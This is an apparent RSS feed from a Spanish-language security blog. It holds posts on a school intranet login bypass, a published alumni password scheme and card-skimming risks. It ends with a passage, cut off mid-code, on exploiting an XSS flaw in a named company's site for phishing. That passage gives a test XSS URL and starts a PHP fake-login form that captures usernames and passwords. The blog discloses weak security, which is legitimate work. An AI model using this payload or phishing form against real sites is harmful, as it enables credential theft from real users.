		<comments>http://blog.zerial.org/seguridad/sitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 02:16:43 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[informacion]]></category>
		<category><![CDATA[privacidad]]></category>
		<category><![CDATA[seguridad de la informacion]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1451</guid>
		<description><![CDATA[La idea de este post es crear una lista de sitios que no se preocupan por la protección de datos, ya sea de la misma empresa o bien de personas (clientes o empleados). Si bien estos errores son cometidos por el desarrollador o programador de la plataforma, los que se deben preocupar de que el [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/privacy.jpg"><img class="alignleft size-full wp-image-1456" style="margin: 4px;" title="privacy" src="http://blog.zerial.org/wp-content/uploads/2010/01/privacy.jpg" alt="Privacidad" width="174" height="185" /></a>La idea de este post es crear una lista de sitios que no se preocupan por la protección de datos, ya sea de la misma empresa o bien de personas (clientes o empleados). Si bien estos errores son cometidos por el desarrollador o programador de la plataforma, los que se deben preocupar de que el sitio quede bien hecho y que no tenga éste tipo de fallos, son los encargados de contratar a éste programador.</p>
<p>Los errores más <span style="text-decoration: line-through;">estúpidos</span> comunes son validaciones mal hechas para ingresar a intranets, ficheros de respaldos visibles publicamente, directorios con información confidencial no protegidos, etc. Yo, como programador, se como funcionan estas cosas, los clientes quieren muchas cosas por muy poco dinero y, por ésto mismo, el programador decide optar por el camino más rápido posible. Por otro lado, sabemos que a los clientes no les importa mucho la seguridad y que cuando le dices que cobrarás un poco más por el hecho de agregarle seguridad al sitio o al sistema, ellos no lo entienden y prefieren el camino más barato. En fín, mientras no se invierta en seguridad, seguirán sucediendo cosas como las que les mostraré a continuación.</p>
<p><span id="more-1451"></span></p>
<p>El primer caso (gracias a xwall o más conocido como <em>El Arma Secreta</em>, miembro del <a href="http://hacklab.cl" target="_blank">Hacklab</a> por la información) es el del <a href="http://www.ichmaristas.cl/" target="_blank"><strong>Instituto Chacabuco</strong></a> (del Colegio Maristas) quienes tienen una intranet donde podemos encontrar los datos de tosos los alumnos y apoderados. Estos datos son nombre, dirección, e-mail, número telefónico, etc.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca11.png"><img class="alignnone size-medium wp-image-1464" title="instichaca1" src="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca11-300x180.png" alt="" width="300" height="180" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca21.png"><img class="alignnone size-medium wp-image-1465" title="instichaca2" src="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca21-300x174.png" alt="" width="300" height="174" /></a></p>
<p>Estos pantallazos pertenecen al area de administración de estudiantes (una intranet) que en <strong>teoría</strong> requiere un login, pero se puede <strong>bypass<em>ear</em></strong> fácilmente.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca3.png"><img class="aligncenter size-full wp-image-1467" title="instichaca3" src="http://blog.zerial.org/wp-content/uploads/2010/01/instichaca3.png" alt="" width="449" height="220" /></a></p>
<p>Este sitio además de poder mirar información, nos permite agregar, eliminar y modificar datos. Estoy seguro de que la misma forma que cometieron éste error, tienen otros más y que al agregar un usuario puedo adjuntar ficheros y lograr subir un archivo que me permita ejecutar código arbitrario en el servidor.<br />
<em><br />
<strong>Pronto publicaré otro sitio con información expuesta.</strong></em></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco%2F&amp;linkname=Sitios%20que%20no%20protegen%20la%20informaci%C3%B3n%20%28Parte%20I%29%3A%20Instituto%20Chacabuco">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/sitios-que-no-protegen-la-informacion-parte-i-instituto-chacabuco/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Seguridad en accesos de ex alumnos del Instituto Profesional CIISA</title>
		<link>http://blog.zerial.org/seguridad/seguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa/</link>
		<comments>http://blog.zerial.org/seguridad/seguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 15:07:29 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ciisa]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ip ciisa]]></category>
		<category><![CDATA[login]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1440</guid>
		<description><![CDATA[Si hablamos de un Instituto Profesional y Centro de Informática e Ingeniería de Sistemas en Administración, nos imaginamos un lugar para estudiar y aprender temas relacionados con informática, redes, etc. Como se describen ellos mismos: El IP CIISA es una entidad de educación superior que tiene la misión de formar profesionales y técnicos de nivel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/ipciisa.png"><img class="alignleft size-full wp-image-1443" style="margin: 4px;" title="ipciisa" src="http://blog.zerial.org/wp-content/uploads/2010/01/ipciisa.png" alt="" width="153" height="47" /></a>Si hablamos de un <em>Instituto Profesional y Centro de Informática e Ingeniería de Sistemas en Administración</em>, nos imaginamos un lugar para estudiar y aprender temas relacionados con informática, redes, etc.<br />
Como se describen ellos mismos:</p>
<blockquote><p>El IP CIISA es una entidad de educación superior que tiene la misión de formar profesionales y técnicos de nivel superior en las áreas del conocimiento vinculadas a las tecnologías de la información y las redes y comunicación de datos.</p></blockquote>
<p>Sin embargo, si ingresamos al sitio web y nos vamos a &#8220;ExAlumnos&#8221; podemos ver como ellos mismos nos indican, publicamente, la clave de acceso para cada usuario.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/exalumnos_ciisa.png"><img class="aligncenter size-full wp-image-1445" title="exalumnos_ciisa" src="http://blog.zerial.org/wp-content/uploads/2010/01/exalumnos_ciisa.png" alt="" width="504" height="252" /></a>Dice claramente: &#8220;<strong>4 primeros dígitos del rut + año de nacimiento</strong>&#8220;.</p>
<p>Me recuerda mucho a <a href="http://www.securitybydefault.com/2009/10/fail-codigo-de-seguridad.html" target="_blank">una entrada que vi en SecurityByDefault</a> hace un par de meses atrás, donde ponían un código de seguridad sobre el teclado numérico para escribir el mismo.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fseguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa%2F&amp;linkname=Seguridad%20en%20accesos%20de%20ex%20alumnos%20del%20Instituto%20Profesional%20CIISA">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/seguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Seguridad cotidiana: cajeros automáticos, tarjetas de crédito, teléfonos públicos, etc</title>
		<link>http://blog.zerial.org/interes-general/seguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc/</link>
		<comments>http://blog.zerial.org/interes-general/seguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc/#comments</comments>
		<pubDate>Sun, 17 Jan 2010 14:43:24 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Interes general]]></category>
		<category><![CDATA[bancos]]></category>
		<category><![CDATA[cajeros automaticos]]></category>
		<category><![CDATA[clonacion]]></category>
		<category><![CDATA[estafa]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[skimmer]]></category>
		<category><![CDATA[telefonica]]></category>
		<category><![CDATA[telefonos publicos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1420</guid>
		<description><![CDATA[Con seguridad cotidiana me refiero a la seguridad de lo que vivímos en el día a día, cuando usamos un teléfono público, cuando vamos a un cajero automático a sacar dinero o bien cuando hacemos una compra con tarjeta de crédito. Yo he sido víctima de la falta de seguridad en éstos 3 casos, si [...]]]></description>
			<content:encoded><![CDATA[<p>Con <em>seguridad cotidiana</em> me refiero a la seguridad de lo que vivímos en el día a día, cuando usamos un teléfono público, cuando vamos a un cajero automático a sacar dinero o bien cuando hacemos una compra con tarjeta de crédito.<br />
Yo he sido víctima de la falta de seguridad en éstos 3 casos, si bien nunca me han robado dinero ni clonado mi tarjeta, si me he sentido inseguro utilizando alguno de los servicios. No hablaré solamente del fallo de seguridad de las empresas, tambien de la poca seguridad que tienen los mismos usuarios</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/seguridad_cajero_telefono_publico_credito.png"><img class="aligncenter size-full wp-image-1421" title="seguridad_cajero_telefono_publico_credito" src="http://blog.zerial.org/wp-content/uploads/2010/01/seguridad_cajero_telefono_publico_credito.png" alt="seguridad cotidiana: cajeros automaticos, tarjeta de credito, telefono publico" width="460" height="140" /></a></p>
<p>Tanto las empresas como los usuarios (clientes) no tienen las suficientes medidas de seguridad al utilizar uno de éstos servicios, muchas veces los usuarios no denuncian una anomalía, por lo que para las empresas es difícil dar solución a algo de lo que no tienen conocimiento. Por otro lado, las empresas, cuando un usuario les denuncia algun problema, no son capaces de dar solución.</p>
<p><span id="more-1420"></span></p>
<h3>Tarjetas de crédito</h3>
<p>El proceso <strong>corecto</strong> para realizar una compra (tanto por parte del usuario como por parte del vendedor) es entregar al vendedor la tarjeta de crédito y el carnet de identidad, el vendedor imprime desde la maquinita una boleta o ticket, el comprador debe firmar y anotar su número de identidad, luego el vendedor debe verificar la validéz de éstos datos con el carnet de identidad.<strong> ¿Qué pasa generalmente?</strong> El vendedor entrega el carnet de identidad y la tarjeta de crédito antes de que el comprador firme el ticket, por lo que obviamente, el vendedor jamás podrá comparar si la firma y el número de identidad son correctos. Yo he hecho el ejercicio más de una véz, cuando me entregan el ticket simplemente firmo con un &#8220;<em>yeah!</em>&#8221; y escribo cualquier número de identidad muy distinto al mio, el vendedor lo único que hace es decir &#8220;<em>gracias por la compra, hasta luego</em>&#8220;. <strong>¿Qué pasa actualmente?</strong> En las últimas 5 compras que he hecho, el vendedor no ha sido capáz de pedirme ni si quiera el carnet de identidad.</p>
<p>Con todo ésto, yo me siento vulnerable, siento que si se me pierden mis documentos o me los roban, podrán realizar compras sin ningún problema y claro, cuando yo vaya a reclamar al banco, ellos no me darán ninguna solución. Está de moda en los bancos ofrecer un &#8220;<em>seguro anti fraude</em>&#8221; que te &#8220;protege&#8221; de éste tipo de hechos, pero hay que pagar, es decir, hay que pagar por la seguridad que ellos <strong>deben</strong> ofrecernos.<br />
Yo me he puesto a pensar en más de una oportunidad que perfectamente podría reclamar que jamás he hecho una compra, ya que no tendrían como comprobar que fui yo quien hizo la compra en ese local, ya que el vendedor jamás verificó si mis datos eran reales.<br />
Actualmente, los bancos están implementando en famoso <a href="http://www.pinpass.cl" target="_blank">PinPass</a> que, supuestamente, mejoraría la seguridad y ayudaría al usuario a realizar sus compras de una forma más tranquila. En éstas 5 últimas compras que he hecho, el vendedor me pregunta <em>¿Tiene su pinpass?</em> y mi respuesta es &#8220;<em>no</em>&#8221; entonces él me dice &#8220;<em>ok, entonces presione enter sin escribir nada</em>&#8220;.<br />
Yo intenté denunciar éste hecho con mi ejecutivo de cuentas pero no obtuve respuesta. Les dejo el email que le he enviado:</p>
<blockquote><p>Hola,</p>
<p>En los ultimos 5 o 6 meses, cada vez que compro con mi tarjeta<br />
mastercard, con o sin cuotas, no me piden ni mi carnet ni tampoco me<br />
hacen firmar la boleta. Esto demuestra que el metodo de compra no tienen<br />
ningun mecanismo de seguridad, mi problema nace cuando pienso que que<br />
pasaria si me roban mis documentos incluyendo mi tarjeta de credito? La<br />
persona podra comprar como si nada.</p>
<p>El dialogo entre yo y el vendedor es:</p>
<p><strong>Vendedor</strong>: Como cancela?<br />
Yo: Con mastercard<br />
<strong>Vendedor</strong>: Ok &#8230; Deslicela por ahi<br />
Yo: Ok.<br />
<strong>Vendedor</strong>: Tiene PinPass?<br />
Yo: No.<br />
<strong>Vendedor</strong>: Ok, entonces presione &#8216;enter&#8217;.<br />
Yo: Ok.<br />
<strong>Vendedor</strong>: Muchas gracias por su compra, hasta luego!</p>
<p>Esto me tiene bastante molesto ya que de una u otra forma, me estoy<br />
sintiendo presionado por el banco a contratar el &#8220;seguro de fraude&#8221; (o<br />
algo asi), siento que si no lo contrato, como no me piden carnet ni<br />
firma al comprar, no tendre derecho a reclamo si algo me llega a suceder.</p>
<p>Me gustaria saber que solucion me pueden dar para esta inquietud.</p>
<p>Saludos.</p></blockquote>
<p>Intentaré escalar el problema a otra persona, hasta que me den alguna respuesta.</p>
<p><a href="http://www.securitybydefault.com/2010/01/pagos-con-tarjeta-identificacion.html" target="_blank">Artículo relacionado.</a></p>
<h3>Cajeros automáticos</h3>
<p>Hace unos días leí un artículo que hablaba sobre el <strong>Skimmer</strong>, se trata de un <em>aparato</em> que se sobrepone a la ranura donde se inserta la tarjeta y el usuario no se da cuenta y apenas inserta la tarjeta ésta es clonada.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/cajero_skimmer.jpg"><img class="aligncenter size-full wp-image-1432" title="cajero_skimmer" src="http://blog.zerial.org/wp-content/uploads/2010/01/cajero_skimmer.jpg" alt="skimmer, estafa y clonacion de tarjetas de credito" width="448" height="336" /></a></p>
<p>Irónicamente, este &#8220;dispositivo&#8221; mejora la usabilidad del cajero, ya que en algunos casos les agrega una leyenda de ayuda de cómo insetar la tarjeta y tambien una leyenda en braile.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/skim1-2.jpg"><img class="aligncenter size-full wp-image-1433" title="skim1-2" src="http://blog.zerial.org/wp-content/uploads/2010/01/skim1-2.jpg" alt="" width="511" height="503" /></a>El dispositivo de la imágen fue creado con partes de un reproductor mp3. Algunos Skimmers son altamente sofisticados y son capaces de enviar sms cada véz que se inserta una tarjeta.<br />
El artículo completo fue <a href="http://meneame.net/story/habrias-dado-cuenta-fraude-eng" target="_blank">publicado en meneame</a> y se pueden leer comentarios bastante interesantes al respecto. El artículo original lo puedes encontrar <a href="http://www.krebsonsecurity.com/2010/01/would-you-have-spotted-the-fraud/" target="_blank">aquí</a>.</p>
<h3>Teléfonos públicos</h3>
<p>En este punto solo quiero enlazar a un articulo que escribi hace un tiempo, contando una anéctoda cuando me sentí estafado por 3 &#8220;actores&#8221;: el personal del metro de santiago, telefónica y por una persona que abría los teléfonos y se llevaba el dinero.<br />
El artículo se llama: <a href="http://blog.zerial.org/interes-general/robo-en-los-telefonos-publicos-de-telefonica/">Robo en los teléfonos públicos de telefónica</a>.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Finteres-general%2Fseguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc%2F&amp;linkname=Seguridad%20cotidiana%3A%20cajeros%20autom%C3%A1ticos%2C%20tarjetas%20de%20cr%C3%A9dito%2C%20tel%C3%A9fonos%20p%C3%BAblicos%2C%20etc">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/interes-general/seguridad-cotidiana-cajeros-automaticos-tarjetas-de-credito-telefonos-publicos-etc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Haciendo phishing explotando una vulnerabilidad XSS</title>
		<link>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/</link>
		<comments>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/#comments</comments>
		<pubDate>Wed, 23 Dec 2009 23:41:38 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1321</guid>
		<description><![CDATA[Usaré de ejemplo un sitio que ya he usado en alguno de mis post, cuando hice los tests a las empresas de hosting. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc. La empresa afectada es una [...]]]></description>
			<content:encoded><![CDATA[<p>Usaré de ejemplo un sitio que ya he usado en <a href="http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-dch/" target="_blank">alguno de mis post</a>, cuando hice los <a href="http://blog.zerial.org/seguridad/testing-de-calidad-a-las-empresas-de-hosting-y-desarrollo-web-en-chile/" target="_blank">tests a las empresas de hosting</a>. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc.</p>
<p>La empresa afectada es una <a href="http://www.yagode.cl" target="_blank">inmobiliaria y constructora &#8220;Yagode&#8221;</a>, la vulnerabilidad XSS se encuentra en el script &#8220;<em>proyectos.php</em>&#8220;, al no parsear la variable <em>tipo</em>. Tiene protección contra XSS, pero no es efectiva. Podemos comprobar ingresando a</p>
<blockquote><p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;" target="_blank"><strong>http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;</strong></a></p></blockquote>
<p>Obtenemos el mensaje de error <strong>406 &#8220;Not Acceptable&#8221;</strong>,</p>
<blockquote>
<h2>Not Acceptable</h2>
<p>An appropriate representation of the requested resource /proyectos.php could not be found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></blockquote>
<p>Sin embargo, permite incluir otro tipo de código como un <strong>iframe</strong>.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2009/12/xss.png"><img class="aligncenter size-medium wp-image-1331" title="xss" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss-300x193.png" alt="" width="300" height="193" /></a></p>
<p><span id="more-1321"></span></p>
<p>Vamos a armar un pequeño código en php con un formulario que nos capture la información, simulando un login, bien simple, que cumpla con el estándar del sitio web (fondo azúl y <strong>bien feo</strong>)</p>
<pre name="code" class="php"><html>
<body bgcolor=#0248BC>
< ?php
if($_GET['login'] == "ok")
        die("user: ".$_POST['user']."pass: ".$_POST['pass']);
?>
<form method="post" action="?login=ok">
Usuario:
<input type="text" name="user"/>
Password:
<input type="password" name="pass"/>
